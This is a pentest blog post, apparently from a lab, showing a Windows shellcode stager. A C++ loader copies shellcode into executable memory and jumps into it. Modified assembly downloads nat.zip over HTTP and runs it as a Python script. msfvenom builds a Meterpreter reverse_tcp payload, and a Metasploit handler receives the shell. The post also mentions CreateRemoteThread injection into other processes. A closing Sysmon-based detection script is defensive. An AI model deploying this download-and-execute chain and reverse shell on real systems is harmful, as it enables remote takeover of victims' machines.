{{tag>IT-Security Windows Kali pentest blog english}}

====== Shellcode Injection Part 3 ======

{{it-security:blog:shellcode-part-3.png?400|}}

Shellcode injections are generally used to initiate a reverse shell. However, in some circumstances it may be necessary to load the code for the shell in a second step. In this blog post, I show how we can use a shellcode injection to load a file via HTTP and then execute it.

\\ \\

===== Code =====

==== C++ source ====

First, we need a small programme that loads the shellcode into memory and then jumps into it.

<code cpp>
...
// buf represents the shellcode
unsigned char buf[] = "\xeb\x74\x31\...\x69\x70\x00";

int main(int argc, char** argv)
{
    ...
    // allocate memory: 0x1000 = MEM_COMMIT, 0x40 = PAGE_EXECUTE_READWRITE
    void* stage = VirtualAlloc(0, 0x1000, 0x1000, 0x40);
    void (*target)();
    ...
    // move the shellcode into memory (copy only the array itself; copying 0x1000 bytes would read past buf)
    memmove(stage, buf, sizeof(buf));
    ...
    // move shellcode address to eax and jump
    __asm {
        mov eax, target
        jmp eax
    }
}
</code>

You can find the complete code in the [[https://github.com/psycore8/nosoc-shellcode/tree/main/nosoc-shellcode-3|Repository]].

\\ \\

==== Assembly ====

A well documented assembler code can be found in the [[https://github.com/stephenbradshaw/shellcode/blob/master/descript.asm|Repository by Stephen Bradshaw]].

=== Customise assembly ===

The code executes a downloaded VBS file. However, we want to start a Python script that creates a Meterpreter shell. To do this, we change the following places:

<code asm>
; line 143 / +7 marks the beginning of the filename (WindowsAgent.py)
lea edx, [esi + 7]

; line 184 / command line to execute
db "python WindowsAgent.py", 0

; line 192 / our URL
db "http://172.26.72.38/nat.zip", 0
</code>

\\ \\

=== Create shellcode ===

We have to create the shellcode as an ''%%x86 Windows%%'' binary file.
We do this with ''%%nasm%%'':

<code bash>
nasm -f win32 download.asm -o shellcode.o
</code>

Now we print the binary in a ''%%C++%%''-friendly form:

<code bash>
objdump -D ./shellcode.o |grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-6 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g'
</code>

We use the output as the shellcode in our ''%%C++%%'' code and compile our project.

\\ \\

=== Test shellcode ===

To understand the shellcode, we then debug the programme. We search for the call of the function ''%%main()%%'':

{{it-security:blog:2024-120_-1.png}}

From ''%%main()%%'' we look for the jump to the shellcode memory area. In our program, we have implemented this with inline assembly: ''%%call eax%%''. This looks like this in the debugger:

{{it-security:blog:2024-120_-2.png}}

If we now jump in, we see our shellcode:

{{it-security:blog:2024-120_-3.png}}

From here we can understand and test the procedures.

\\ \\

===== Payload =====

==== Prepare Meterpreter payload ====

As mentioned at the beginning, we want to create a Meterpreter shell using Python. So we need a corresponding payload. We generate it with ''%%msfvenom%%'':

<code bash>
msfvenom -p python/meterpreter/reverse_tcp LHOST=172.26.72.38 LPORT=4500 > payload.py
</code>

The shellcode loads the file ''%%nat.zip%%'' from an HTTP server, saves it as ''%%WindowsAgent.py%%'' and then executes it. So we prepare this accordingly:

<code bash>
cp payload.py nat.zip
python -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
</code>

Last but not least, we need a Metasploit handler that receives our shell. This can be created using the ''%%nosoc3.rc%%'' script:

<code>
msf6 > resource nosoc3.rc
[*] Processing /home/kali/nosoc3.rc for ERB directives.
resource (/home/kali/nosoc3.rc)> use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
resource (/home/kali/nosoc3.rc)> set payload python/meterpreter/reverse_tcp
payload => python/meterpreter/reverse_tcp
resource (/home/kali/nosoc3.rc)> set lhost 0.0.0.0
lhost => 0.0.0.0
resource (/home/kali/nosoc3.rc)> set lport 4500
lport => 4500
resource (/home/kali/nosoc3.rc)> run
[*] Started reverse TCP handler on 0.0.0.0:4500
</code>

Now everything is ready.

\\ \\

==== Attack ====

Now start the programme on the target PC.

{{it-security:blog:2024-120_-4.png}}

The Python script is downloaded:

{{it-security:blog:2024-120_-5.png}}

And finally we are greeted by a Meterpreter shell:

{{it-security:blog:2024-120_-6.png}}

\\ \\

===== CreateRemoteThread =====

Of course, we can also inject the shellcode into external processes. An example programme for this is also available in the repository. To start it, the target PID must be passed as an argument:

<code>
RemoteInject.exe 10001
</code>

\\ \\

===== Repository =====

<code bash>
git clone https://github.com/psycore8/nosoc-shellcode
</code>
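The stager shown above leaves a distinctive host trace: the loader process fetches ''%%nat.zip%%'' over HTTP, writes it to disk as ''%%WindowsAgent.py%%'' and then spawns ''%%python%%'' on it. As an added example that is not part of the original post or repository, the following Python correlates constructed Sysmon-style events (IDs 3, 11 and 1 with Sysmon's field names) to flag a freshly dropped script executed by the writer's own child interpreter; the PIDs, paths, timestamps and the ''%%loader.exe%%'' name are made up for the sample.

```python
import ntpath
from datetime import datetime, timedelta

INTERPRETERS = {"python.exe", "python3.exe", "pythonw.exe", "wscript.exe", "cscript.exe"}
WINDOW = timedelta(seconds=60)  # how soon after the write the execution must follow

# Constructed sample events (Sysmon-style field names; PIDs, paths and times are made up).
SAMPLE_EVENTS = [
    {"EventID": 3, "UtcTime": "2024-05-01 10:00:00", "ProcessId": 4120,
     "Image": "C:\\Users\\lab\\loader.exe", "DestinationIp": "172.26.72.38", "DestinationPort": 80},
    {"EventID": 11, "UtcTime": "2024-05-01 10:00:01", "ProcessId": 4120,
     "Image": "C:\\Users\\lab\\loader.exe", "TargetFilename": "C:\\Users\\lab\\WindowsAgent.py"},
    {"EventID": 1, "UtcTime": "2024-05-01 10:00:02", "ProcessId": 4188, "ParentProcessId": 4120,
     "Image": "C:\\Python312\\python.exe", "CommandLine": "python WindowsAgent.py",
     "CurrentDirectory": "C:\\Users\\lab\\"},
    # Benign: an editor saves a script and the user runs it a quarter of an hour later.
    {"EventID": 11, "UtcTime": "2024-05-01 10:05:00", "ProcessId": 900,
     "Image": "C:\\Program Files\\Editor\\editor.exe", "TargetFilename": "C:\\Users\\lab\\notes.py"},
    {"EventID": 1, "UtcTime": "2024-05-01 10:20:00", "ProcessId": 901, "ParentProcessId": 900,
     "Image": "C:\\Python312\\python.exe", "CommandLine": "python notes.py",
     "CurrentDirectory": "C:\\Users\\lab\\"},
]

def _ts(event):
    return datetime.strptime(event["UtcTime"], "%Y-%m-%d %H:%M:%S")

def _script_path(cmdline, cwd):
    # Naive: take the last command-line token as the script and resolve it against the CWD.
    arg = cmdline.split()[-1].strip('"')
    return (arg if ntpath.isabs(arg) else ntpath.join(cwd, arg)).lower()

def find_dropped_script_execution(events):
    """Return (writer_pid, script, interpreter_pid, writer_last_remote_ip) for every case
    where a process wrote a file and its own child interpreter ran that file within WINDOW."""
    last_remote = {}  # pid -> most recent outbound destination (EventID 3)
    created = {}      # lower-cased path -> (writer pid, creation time) (EventID 11)
    hits = []
    for e in sorted(events, key=_ts):
        if e["EventID"] == 3:
            last_remote[e["ProcessId"]] = e["DestinationIp"]
        elif e["EventID"] == 11:
            created[e["TargetFilename"].lower()] = (e["ProcessId"], _ts(e))
        elif e["EventID"] == 1 and ntpath.basename(e["Image"]).lower() in INTERPRETERS:
            script = _script_path(e["CommandLine"], e["CurrentDirectory"])
            writer = created.get(script)
            if writer and writer[0] == e["ParentProcessId"] and _ts(e) - writer[1] <= WINDOW:
                hits.append((writer[0], script, e["ProcessId"], last_remote.get(writer[0])))
    return hits
```

The benign editor case falls outside the 60-second window and is not reported; tune ''%%WINDOW%%'' and ''%%INTERPRETERS%%'' to the environment rather than treating the sample values as a rule.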